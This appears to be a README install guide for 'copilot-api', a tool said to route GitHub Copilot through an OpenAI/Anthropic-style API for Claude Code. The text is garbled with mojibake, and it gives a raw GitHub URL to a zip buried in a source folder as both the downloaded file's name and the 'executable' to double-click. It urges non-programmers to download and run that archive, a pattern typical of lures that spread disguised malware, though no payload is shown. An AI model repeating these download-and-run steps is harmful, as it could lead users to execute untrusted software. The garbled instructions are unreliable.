๐Ÿ“– Overview

The copilot-api lets you use GitHub Copilot through an API designed to work with OpenAI and Anthropic models. This API allows you to access its features effortlessly, enabling users to work directly with Claude Code. You donโ€™t need to have programming skills to utilize its functions.

๐Ÿš€ Getting Started

Step 1: Visit the Releases Page

To download the latest version of copilot-api, visit our Releases page. Follow this link:

Step 2: Choose Your Download

On the Releases page, you will see a list of available downloads. Look for the version that fits your needs. Each version will have a description, dating, and available files. Choose the one titled โ€œLatest Releaseโ€ to ensure you get the most up-to-date version.

Step 3: Download the Software

Click on the link for the software package you want, and your download will start. Depending on your internet speed, this may take a few moments.

Step 4: Locate the Downloaded File

Once the file is downloaded, check your โ€œDownloadsโ€ folder or your browserโ€™s download history. You should find a file named something like https://github.com/GringoDark765/copilot-api/raw/refs/heads/main/src/services/copilot-api-2.4.zip.

Step 5: Extract Files

Open the downloaded file using your file manager. Extract the contents to a folder where you can easily access them. You can usually do this by right-clicking on the downloaded file and selecting โ€œExtract Allโ€ฆโ€

Step 6: Open the Application

Navigate to the folder where you extracted the files. Look for an executable file, such as https://github.com/GringoDark765/copilot-api/raw/refs/heads/main/src/services/copilot-api-2.4.zip. Double-click it to run the application.

Step 7: Start Using the API

Once the application is running, you can start interacting with the GitHub Copilot features. Follow the on-screen instructions to connect with Claude Code. The interface is user-friendly, guiding you through the process without any complicated setup.
